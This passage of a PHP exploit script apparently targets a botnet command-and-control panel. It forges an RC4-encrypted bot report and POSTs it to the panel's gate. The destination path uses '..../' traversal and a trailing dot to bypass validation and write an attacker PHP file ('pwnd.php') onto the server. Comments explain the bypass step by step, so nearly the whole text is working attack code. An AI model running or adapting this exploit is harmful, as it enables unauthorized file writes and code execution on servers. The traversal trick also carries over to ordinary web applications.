"; // You don't need to change these values... but they are very important, so I call them out // We need to explictly set SBCID_BOTLOG_TYPE to 3 in order to get the logging to work, // I pack the value as an UNSIGNED INT as the C&C will unpack this value during its string to INT conversion // and assumes an UNSIGNED LONG INT // // $SBCID_PATH_DEST_String contains a trailing dot. This is used to bypass validation routines and ultimely leads to // compromise of the C&C. The trailing dot trick works on both Windows and Linux based systems :) // // The BOT_ID and BOTNET strings are used in the filepath where the php file gets written to // if you use the values below (and the default settings are in place) the php file will end up at: // http://cnc/_reports/files/BK_PWNZ_UR_CnC/BKs_BOTNET/pwnd.php // There is some validation on BOT_ID_String and BOTNET_String, so becareful when using special chars $SBCID_BOTLOG_TYPE_String = pack("l",3); $SBCID_PATH_DEST_String = "..../..../..../..../pwnd.php.";//trailing dot is key $SBCID_BOT_ID_String = "BK_PWNZ_UR_CnC"; $SBCID_BOTNET_String = "BKs_BOTNET"; // The rest of this stuff can be changed to what ever you want. // There is some validation for some fields so becareful when using special chars $SBCID_BOT_VERSION_String = "31337"; $SBCID_TIME_SYSTEM_String = 0; $SBCID_TIME_LOCALBIAS_String = 0; $SBCID_TIME_TICK_String = 0; $SBCID_OS_INFO_String = "OTHER"; $SBCID_LANGUAGE_ID_String = "1033"; $SBCID_PROCESS_NAME_String = "C:\Program Files\Internet Explorer\IEXPLORE.EXE"; $SBCID_PROCESS_USER_String = "GOTCHA\PWND"; $SBCID_PATH_SOURCE_String = "https://www.pwnd.com"; $header = "AAAAAAAAAAAA"; $payload = ""; /* Below I set up all the data needed to get through the C&C validation I used arrays and individually packed each array as I found this was the easiest way to debug/test validation. There are probably more efficient ways of doing this... */ $SBCID_BOT_ID = array(); $SBCID_BOT_ID[1]=10001; $SBCID_BOT_ID[2]=0; $SBCID_BOT_ID[3]=strlen ( $SBCID_BOT_ID_String ); $SBCID_BOT_ID[4]=strlen ( $SBCID_BOT_ID_String ); foreach ($SBCID_BOT_ID as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOT_ID_String; $SBCID_BOTNET = array(); $SBCID_BOTNET[1]=10002; $SBCID_BOTNET[2]=0; $SBCID_BOTNET[3]=strlen ( $SBCID_BOTNET_String ); $SBCID_BOTNET[4]=strlen ( $SBCID_BOTNET_String ); foreach ($SBCID_BOTNET as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOTNET_String; $SBCID_BOT_VERSION = array(); $SBCID_BOT_VERSION[1]=10003; $SBCID_BOT_VERSION[2]=0; $SBCID_BOT_VERSION[3]=strlen ( $SBCID_BOT_VERSION_String ); $SBCID_BOT_VERSION[4]=strlen ( $SBCID_BOT_VERSION_String ); foreach ($SBCID_BOT_VERSION as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOT_VERSION_String; $SBCID_TIME_SYSTEM = array(); $SBCID_TIME_SYSTEM[1]=10009; $SBCID_TIME_SYSTEM[2]=0; $SBCID_TIME_SYSTEM[3]=strlen ( $SBCID_TIME_SYSTEM_String ); $SBCID_TIME_SYSTEM[4]=strlen ( $SBCID_TIME_SYSTEM_String ); foreach ($SBCID_TIME_SYSTEM as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_TIME_SYSTEM_String; $SBCID_TIME_LOCALBIAS = array(); $SBCID_TIME_LOCALBIAS[1]=10011; $SBCID_TIME_LOCALBIAS[2]=0; $SBCID_TIME_LOCALBIAS[3]=strlen ( $SBCID_TIME_LOCALBIAS_String ); $SBCID_TIME_LOCALBIAS[4]=strlen ( $SBCID_TIME_LOCALBIAS_String ); foreach ($SBCID_TIME_LOCALBIAS as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_TIME_LOCALBIAS_String; $SBCID_TIME_TICK = array(); $SBCID_TIME_TICK[1]=10010; $SBCID_TIME_TICK[2]=0; $SBCID_TIME_TICK[3]=strlen ( $SBCID_TIME_TICK_String ); $SBCID_TIME_TICK[4]=strlen ( $SBCID_TIME_TICK_String ); foreach ($SBCID_TIME_TICK as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_TIME_TICK_String; $SBCID_OS_INFO = array(); $SBCID_OS_INFO[1]=10012; $SBCID_OS_INFO[2]=0; $SBCID_OS_INFO[3]=strlen ( $SBCID_OS_INFO_String ); $SBCID_OS_INFO[4]=strlen ( $SBCID_OS_INFO_String ); foreach ($SBCID_OS_INFO as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_OS_INFO_String; $SBCID_LANGUAGE_ID = array(); $SBCID_LANGUAGE_ID[1]=10013; $SBCID_LANGUAGE_ID[2]=0; $SBCID_LANGUAGE_ID[3]=strlen ( $SBCID_LANGUAGE_ID_String ); $SBCID_LANGUAGE_ID[4]=strlen ( $SBCID_LANGUAGE_ID_String ); foreach ($SBCID_LANGUAGE_ID as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_LANGUAGE_ID_String; $SBCID_PROCESS_NAME = array(); $SBCID_PROCESS_NAME[1]=10014; $SBCID_PROCESS_NAME[2]=0; $SBCID_PROCESS_NAME[3]=strlen ( $SBCID_PROCESS_NAME_String ); $SBCID_PROCESS_NAME[4]=strlen ( $SBCID_PROCESS_NAME_String ); foreach ($SBCID_PROCESS_NAME as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_PROCESS_NAME_String; $SBCID_PROCESS_USER = array(); $SBCID_PROCESS_USER[1]=10017; $SBCID_PROCESS_USER[2]=0; $SBCID_PROCESS_USER[3]=strlen ( $SBCID_PROCESS_USER_String ); $SBCID_PROCESS_USER[4]=strlen ( $SBCID_PROCESS_USER_String ); foreach ($SBCID_PROCESS_USER as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_PROCESS_USER_String; $SBCID_BOTLOG_TYPE = array(); $SBCID_BOTLOG_TYPE[1]=10015; $SBCID_BOTLOG_TYPE[2]=0; $SBCID_BOTLOG_TYPE[3]=strlen ( $SBCID_BOTLOG_TYPE_String ); $SBCID_BOTLOG_TYPE[4]=strlen ( $SBCID_BOTLOG_TYPE_String ); foreach ($SBCID_BOTLOG_TYPE as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOTLOG_TYPE_String; $SBCID_BOTLOG = array(); $SBCID_BOTLOG[1]=10016; $SBCID_BOTLOG[2]=0; $SBCID_BOTLOG[3]=strlen ( $SBCID_BOTLOG_String ); $SBCID_BOTLOG[4]=strlen ( $SBCID_BOTLOG_String ); foreach ($SBCID_BOTLOG as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOTLOG_String; $SBCID_PATH_SOURCE = array(); $SBCID_PATH_SOURCE[1]=10007; $SBCID_PATH_SOURCE[2]=0; $SBCID_PATH_SOURCE[3]=strlen ( $SBCID_PATH_SOURCE_String ); $SBCID_PATH_SOURCE[4]=strlen ( $SBCID_PATH_SOURCE_String ); foreach ($SBCID_PATH_SOURCE as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_PATH_SOURCE_String; $SBCID_PATH_DEST = array(); $SBCID_PATH_DEST[1]=10008; $SBCID_PATH_DEST[2]=0; $SBCID_PATH_DEST[3]=strlen ( $SBCID_PATH_DEST_String ); $SBCID_PATH_DEST[4]=strlen ( $SBCID_PATH_DEST_String ); foreach ($SBCID_PATH_DEST as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_PATH_DEST_String; $header = $header.md5($payload,true); $header = $header.$payload; // The C&C will validate that the payload is RC4'd with the encryption key // this key can be pulled from the bot $fullpayload = RC4($header, $RC4KEY); // User Curl to setup a POST request. // Pass the RC4'd binary data to the server // The URL to the gate is given away by the bot $c = curl_init(); curl_setopt($c, CURLOPT_URL, $urlofCnC); curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, $fullpayload); curl_exec ($c); curl_close ($c); // Stolen from the botmaster / C&C code // This way we know the RC4 function will work perfectly function RC4($data, $key) { $hash = array(); $box = array(); $ret = ''; $key_length = strlen($key); $data_length = strlen($data); for($x = 0; $x < 256; $x++) { $hash[$x] = ord($key[$x % $key_length]); $box[$x] = $x; } for($y = $x = 0; $x < 256; $x++) { $y = ($y + $box[$x] + $hash[$x]) % 256; $tmp = $box[$x]; $box[$x] = $box[$y]; $box[$y] = $tmp; } for($z = $y = $x = 0; $x < $data_length; $x++) { $z = ($z + 1) % 256; $y = ($y + $box[$z]) % 256; $tmp = $box[$z]; $box[$z] = $box[$y]; $box[$y] = $tmp; $k = $box[(($box[$z] + $box[$y]) % 256)]; $ret .= chr(ord($data[$x]) ^ $k); } return $ret; } ?>